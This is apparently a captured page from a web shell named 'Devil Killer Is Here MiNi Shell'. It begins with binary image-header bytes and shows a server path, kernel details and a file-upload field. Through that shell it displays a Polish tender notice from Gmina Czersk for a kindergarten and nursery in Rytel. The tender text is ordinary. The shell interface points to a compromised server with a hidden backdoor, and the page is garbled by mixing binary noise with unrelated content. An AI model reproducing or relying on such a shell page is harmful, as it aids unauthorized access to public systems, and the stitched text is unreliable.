JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251023/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251023/0049214301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa budynku przedszkola i opieki nad dziećmi do lat 3 w Rytlu w ramach zadania Utworzenie nowych miejsc żłobkowych w ramach programu Maluch+ 2022-2029 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CZERSK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351274</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czersk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-650</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523954810</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad_miejski@czersk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/czersk</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa budynku przedszkola i opieki nad dziećmi do lat 3 w Rytlu w ramach zadania Utworzenie nowych miejsc żłobkowych w ramach programu Maluch+ 2022-2029 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-775fa922-967d-4e62-adf2-11919b84b7b2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00492143</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00032622/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Budowa budynku przedszkola i opieki nad dziećmi do lat 3 w Rytlu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie jest dofinansowane ze środków programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „Maluch+ 2022- 2029” współfinansowanego z Krajowego Planu na rzecz Odbudowy i Zwiększenia Odporności w ramach inwestycji A4.2.1. pn. Wsparcie programów dofinansowania miejsc opieki nad dziećmi 0-3 lat. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/czersk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między zamawiającym a wykonawcą odbywać się będzie przy użyciu środków komunikacji elektronicznej, za<br/>pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/czersk Zamawiający informuje, że instrukcje<br/>korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania<br/>ofert oraz innych czynności podejmowanych w<br/>niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie<br/>internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>W sytuacjach awaryjnych z wyjątkiem składania ofert zamawiający dopuszcza komunikację elektroniczną poprzez email:<br/>zamowieniapubliczne@czersk.pl lub urzad_miejski@czersk.pl<br/>Adres strony internetowej do komunikacji:<br/>https://platformazakupowa.pl/pn/czersk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zalecenia: 1. Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z zał. nr 2 do „Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI.2. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf3. W celu ewentualnej kompresji danych zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: 3.1. .zip 3.2. .7Z4. Wśród rozszerzeń powszechnych a<br/>niewystępujących w rozporządzeniu KRI występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. 5. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do<br/>składania podpisu osobistego, który wynosi maksymalnie 5MB. 6. W przypadku stosowania przez wykonawcę kwalifikowanego podpisu elektronicznego: 6.1. ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na rozszerzenie .pdf i opatrzenie ich podpisem kwalifikowanym w formacie PAdES. 6.2.pliki w innych formatach niż pdf zaleca się opatrzyć podpisem w formacie XAdES<br/>o typie zewnętrznym. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym. 6.3.<br/>Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.7. Zamawiający zaleca aby w przypadku<br/>podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np.<br/>osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików. 8. Zamawiający zaleca, aby wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania plików oferty. 9. Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji. 10. Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i zachowaniem odpowiedniego odstępu czasu do<br/>zakończenia przyjmowania ofert. Sugerujemy złożenie oferty na 24 godziny przed terminem składania ofert. 11. Jeśli wykonawca<br/>pakuje dokumenty np. w plik o rozszerzeniu .zip zaleca się wcześniejsze podpisanie każdego ze skompresowanych plików. 12. Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty.<br/>13. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>13.1. akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>13.2. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej<br/>pod linkiem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view 14. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl 15. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 .12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa w pkt 7.9 SWZ niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna o przetwarzaniu danych została zawarta w pkt 30 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna o przetwarzaniu danych została zawarta w pkt 30 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.32.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: „Budowa budynku przedszkola i opieki nad dziećmi do lat 3 <br/>w Rytlu w ramach zadania Utworzenie nowych miejsc żłobkowych w ramach programu Maluch+ 2022-2029”<br/><br/>Zadanie jest dofinansowane ze środków programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „Maluch+ 2022-2029” współfinansowanego z Krajowego Planu na rzecz Odbudowy i Zwiększenia Odporności w ramach inwestycji A4.2.1. pn. Wsparcie programów dofinansowania miejsc opieki nad dziećmi 0-3 lat.<br/><br/>Przedmiot zamówienia opisany powyżej ma być realizowany w dwóch etapach:<br/>1)	Etap I – budowa budynku opieki nad dziećmi do lat 3 w Rytlu&#34; w ramach zadania „Utworzenie nowych miejsc żłobkowych w ramach programu Maluch+ 2022-2029”<br/>2)	Etap II – budowa budynku przedszkola – pozostałe pomieszczenia i zagospodarowanie terenu.<br/><br/>1.	Przedmiot zamówienia obejmuje:<br/>Uwaga. Budynek ma zostać wykonany w technologii modułowej.<br/>Uwaga. Budynek oraz pomieszczenia należy wykonać i wykończyć zgodnie z załączoną aranżacją(bez wyposażenia pomieszczeń w meble wolnostojące i zabudowy, dywany, sprzęt).<br/>Uwaga. Pomieszczenia nr 25, 26, 30, 31, 33 i 37 Wykonawca zrealizuje zgodnie z załączoną aranżacją <br/>w pełnym zakresie wraz z pełnym wyposażeniem.<br/>Uwaga. Należy wykonać zgodnie z załączoną aranżacją grafiki i elementy identyfikacji. <br/>Uwaga. Należy przedstawić Zamawiającemu do zatwierdzenia ostateczną kolorystykę wszystkich materiałów wykończeniowych, w tym również okna i drzwi, elewacja, dach itp.<br/>Uwaga. Wykonawca przedstawi Zamawiającemu do zatwierdzenia min. 3 propozycje elementów wyposażenia i wykończeniowych toalet, kuchni i innych pomieszczeń (w tym biały montaż).<br/> Uwaga. Zamawiający dołącza dodatkowe wyjaśnienia do dokumentacji projektowej, stanowiące załącznik nr 1 do OPZ.<br/>2.	Branża budowlana.<br/>1)	Fundamenty.<br/>Uwaga. Należy zachować ciągłość izolacji poziomych z pionowymi.<br/>2)	Ściany.<br/>a)	Ściana zewnętrzna SZ1 EI30.<br/>b)	Ściana wewnętrzna SW1 EI15.<br/>c)	Ściana wewnętrzna SW2 EI15.<br/>d)	Ściana wewnętrzna SW3.<br/>e)	Ściana zewnętrzna SZA1 EI30.<br/>f)	Nadproża.<br/>g)	Słupy żelbetowe.<br/>h)	Podciągi.<br/>3)	Posadzki.<br/>4)	Stolarka okienna i drzwiowa.<br/>5)	Wyposażenie technologiczne.<br/>a)	Regał magazynowy ze stali nierdzewnej, 4 półki pełne, skręcany 1,4x0,5x1,8 - 2 szt.<br/>b)	Regał magazynowy ze stali nierdzewnej, 4 półki pełne, skręcany 1,2x0,5x1,8 - 2 szt.<br/>c)	Stół z basenem 1-komorowym spawany 0,8x0,7x0,85 - 4 szt.<br/>d)	Stół przyścienny z dwiema półkami, spawany 0,5x0,7x0,85 - 2 szt.<br/>e)	Stół przyścienny z dwiema półkami, spawany 1,0x0,7x0,85 - 5 szt.<br/>f)	Stół przyścienny z dwiema półkami, spawany 1,2x0,7x0,85 - 4 szt.<br/>g)	Stół przyścienny z dwiema półkami, spawany 1,6x0,7x0,85 - 3 szt.<br/>h)	Stół przyścienny z dwiema półkami, spawany 1,5x0,7x0,85 - 1 szt.<br/>i)	Stół przyścienny bez półki spawany 0,6x0,7x0,85 - 4 szt.<br/>j)	Stół przyścienny bez półki spawany 0,6x0,7x0,85 - 1 szt.<br/>k)	Stół centralny z półką spawany 1,4x0,7x0,85 - 2 szt.<br/>l)	Stół centralny z półką spawany 1,2x0,7x0,85 - 2 szt.<br/>m)	Wilk do mięsa 0,25x0,43x0,51 - 1 szt.<br/>n)	Szatkownica do warzyw 0,54x0,24x0,45 - 1 szt.<br/>o)	Pojemnik na odpadki jezdny 0,35x0,35x0,5 - 4 szt.<br/>p)	Wpust podłogowy ze stali nierdzewnej z syfonem - 7 szt.<br/>q)	Obieraczka do ziemniaków 0,46x0,46x0,82 - 2 szt.<br/>r)	Umywalka stalowa 0,4x0,295x0,15 - 7 szt.<br/>s)	Dozownik do mydła 0,155x0,065x0,1 - 7 szt.<br/>t)	Dozownik ręczników papierowych 0,365x0,27x0,1 - 7 szt.<br/>u)	Kosz na śmieci fi0,3x0,65 - 7 szt.<br/>v)	Zawór czerpalny ze złączką do węża i zaworem antyskaż - 10 szt.<br/>w)	Szafa chłodnicza ze stali nierdzewnej 0,6x0,6x1,85 - 6 szt.<br/>x)	Zamrażarka skrzyniowa 1,465x0,7x0,825 - 1 szt.<br/>y)	Szafa chłodnicza pod blatowa - 1 szt.<br/>z)	Stół ze zlewem 2-komorowym 1,0x0,7x0,85 - 3 szt.<br/>aa)	Naświetlacz UV 0,358x0,512x0,255 - 2 szt.<br/>bb)	Sterylizator do noży 0,51x0,16x0,61 - 1 szt.<br/>cc)	Zmywarka kapturowa 0,62x0,77x1,90 - 2 szt.<br/>dd)	Zmywarka z wyparzaczem podblatowa 0,56x0,65x0,83 - 1 szt.<br/>ee)	Regał ociekowy z półkami perforowanymi, spawany 0,6x0,7x1,8 - 5 szt.<br/>ff)	Stół przyścienny z otworem na odpadki 0,8x0,7x0,85 - 2 szt.<br/>gg)	Szafa przelotowa 1,2x0,7x2,0 - 1 szt.<br/>hh)	Okienko podawcze 1,0x1,4 hp=0,85 - 2 szt.<br/>ii)	Kocioł warzelny przechylny 1,6x0,56x1,4 - 1 szt.<br/>jj)	Taboret gazowy 2 palniki 1,6x0,56x1,4 - 2 szt.<br/>kk)	Kuchenka gazowa 6-palnikowa z piekarnikiem elektrycznym 1,2x0,7x0,83 - 2 szt.<br/>ll)	Kuchenka gazowa 6-palnikowa z piekarnikiem elektrycznym 1,2x0,7x0,83 - 2 szt.<br/>mm)	Piec konwekcyjno-parowy 0,84x0,91x1,15 - 2 szt.<br/>nn)	Podstawa pod piec konwekcyjny 0,82x0,72x0,5 - 2 szt.<br/>oo)	Wózek 3-półkowy 0,8x0,5x0,85 - 3 szt.<br/>pp)	Roleta podnoszona 1,0x2,1 - 1 szt.<br/>qq)	Stół chłodniczy 3-drzwiowy 1,36x0,7x0,85 - 1 szt.<br/>rr)	Szafa do przechowywania zamknięta 0,9x0,5x2,0 - 2 szt.<br/>6)	Wyposażenie dodatkowe.<br/>a)	UMYWALKA WIELOFUNKCYJNA Z PRZELEWEM wym. 50 x 60 x 20 cm (gł. x szer. x wys.) montaż na wysokości 850 mm do górnej krawędzi umywalki bateria umywalkowa ścienna - 1 szt.<br/>b)	UMYWALKA NABLATOWA OWALNA o podłużnym kształcie i obustronnie zaokrąglonymi bokami wym. 46 x 31 cm, kolor: BIAŁY POŁYSK bateria umywalkowa stojąca, nablatowa - 1 szt.<br/>c)	BRODZIK KWADRATOWY wym. 70 x 70 x 16,5 cm, kolor: BIAŁY montaż na podmurówce wys. 50 cm bateria prysznicowa ścienna z ręcznym natryskiem - 1 szt.<br/>d)	WISZĄCA MISKA WC LEJOWA wym. 33 x 34 x 53,5 cm (szer. x wys. x gł.) montaż na wysokości 350 mm do górnej krawędzi miski wc - 1 szt.<br/>e)	STELAŻ DO MISKI WC wym. 50 x 112 x 12 cm (szer. x wys. x gł.) ZABUDOWA STELAŻA DO MISKI WC PŁYTA 2x GK do pełnej wysokości pomieszczenia - 1 szt.<br/>f)	WISZĄCA MISKA WC wydłużona, dostosowana do osób niepełnosprawnych wym. 355 x 700 mm (szer. x gł.) - 1 szt.<br/>g)	STELAŻ DO MISKI WC wym. 50 x 112 x 12 cm (szer. x wys. x gł.) ZABUDOWA STELAŻA DO MISKI WC PŁYTA 2x GK do pełnej wysokości pomieszczenia - 1 szt.<br/>h)	UMYWALKA Z WYCIĘCIAMI dostosowana do osób niepełnosprawnych wym. 700 x 550 mm (szer. x gł) bateria umywalkowa stojąca - 1 szt.<br/>i)	PISUAR wym. 550 x 330 - 1 szt.<br/>j)	STELAŻ PODTYNKOWY DO PISUARU - 1 szt.<br/>k)	MISKA WC WISZĄCA W ZESTAWIE Z DESKĄ wym. 540 x 355 mm - 1 szt.<br/>l)	STELAŻ DO MISKI WC wym. 50 x 112 x 12 cm (szer. x wys. x gł.) ZABUDOWA STELAŻA DO MISKI WC PŁYTA 2x GK do pełnej wysokości pomieszczenia - 1 szt.<br/>m)	UMYWALKA ZAWIESZANA wym. 48 x 60 cm (gł. x szer.) montaż na wysokości 850 mm do górnej krawędzi umywalki bateria umywalkowa stojąca - 1 szt.<br/>n)	UMYWALKA ZAWIESZANA wym. 49,2 x 50 cm (gł. x szer.) montaż na wysokości 850 mm do górnej krawędzi umywalki bateria umywalkowa stojąca - 1 szt.<br/>o)	ZLEW 1,5-KOMOROWY wym. 46 x 58 cm (gł. x szer.) stal nierdzewna, montaż - szafka, wtopiony bateria zlewozmywakowa z ruchomą wylewką - 1 szt.<br/>p)	PODŁĄCZENIE ZMYWARKI - 1 szt.<br/>q)	ZLEW PORZĄDKOWY wym. 50 x 50 x 50 cm (gł. x szer. x wys.) montaż na wysokości 50 mm do górnej krawędzi zlewu - 1 szt.<br/>r)	ZAWÓR CZERPALNY montaż nad zlewem porządkowym na wysokości 60-70 mm - 1 szt.<br/>s)	WPUST PODŁOGOWY ze stali nierdzewnej z odpływem - 1 szt.<br/>t)	SZAFA PORZĄDKOWA wym. 50 x 80 x 180 cm (gł. x szer. x wys.) metalowa do przechowywania środków czystości i akcesoriów do sprzątania - 1 szt.<br/>u)	SZAFA BIUROWA wym. 50 x 90 x 200 cm (gł. x szer. x wys.) - 1 szt.<br/>v)	KRZESŁO BIUROWE - 1 szt.<br/>w)	BIURKO wym. 80 x 120 x 74 cm (gł. x szer. x wys.) - 1 szt.<br/>x)	SZAFKA SZATNIOWA wym. 55 x 120 x 212 cm (gł. x szer. x wys.) ubraniowa, z ławeczką, 4 moduły - 1 szt.<br/>y)	STÓŁ Z KRZESŁAMI wym. 80 x 240 x 75 cm (gł. x szer. x wys.) krzesło tapicerowane, rama z rur stalowych - 1 szt.<br/>z)	Wycieraczka zewnętrzna z odwodnieniem 80x180cm - 3 szt.<br/>aa)	Wycieraczka zewnętrzna z odwodnieniem 80x250cm - 1 szt.<br/>bb)	Wycieraczka zewnętrzna z odwodnieniem 80x140cm - 1 szt.<br/>7)	Dach.<br/>a)	Rynny.<br/>b)	Strop.<br/>c)	Stropodach SD1.<br/>d)	Stropodach SD2.<br/>e)	Stropodach SD3.<br/>8)	Instalacje teletechniczne.<br/>a)	Budowa szafy GPD oraz okablowania strukturalnego.<br/>b)	Instalacja monitoringu CCTV.<br/>c)	Instalacja alarmowa.<br/>d)	Instalacja systemu kontroli dostępu.<br/>e)	Instalacja systemu TV.<br/>f)	Instalacja wideodomofonu.<br/>g)	Wizualizacja systemu.<br/>9)	Instalacja fotowoltaiczna o mocy 50,00 kWp (Wykonawca musi przygotować zgłoszenie do ENEA Operator Sp. z o.o. na podłączenie instalacji do sieci i uzyskać pozytywną weryfikację oraz zawiadomić KP PSP w Chojnicach o uruchomieniu instalacji).<br/>10)	Wentylacja.<br/>11)	Instalacja wodociągowa.<br/>12)	Instalacja CO (Wykonawca ogrodzi jednostkę zewnętrzną pompy ciepła).<br/>13)	Instalacja kanalizacji.<br/>14)	Instalacja gazu.<br/>3.	Zagospodarowanie terenu.<br/>1)	Miejsca postojowe dla samochodów osobowych i ciągi pieszo-jezdne.<br/>2)	Ciągi piesze i schody.<br/>3)	Opaska wokół budynku.<br/>4)	Tereny zielone.<br/>5)	Plac zabaw (Wykonawca przedstawi Zamawiającemu do zatwierdzenia urządzenia od min. 3 producentów).<br/>6)	Ogrodzenie (ogrodzenie panelowe gr. drutu 5 mm, kolor wybierze Zamawiający).<br/>7)	Instalacja wodociągowa.<br/>8)	Instalacja gazu.<br/>9)	Instalacja kanalizacji sanitarnej.<br/>10)	Instalacja kanalizacji technologicznej.<br/>11)	Instalacja kanalizacji deszczowej.<br/>12)	Instalacja elektryczna.<br/>13)	Instalacja teletechniczna.<br/>Uwaga. 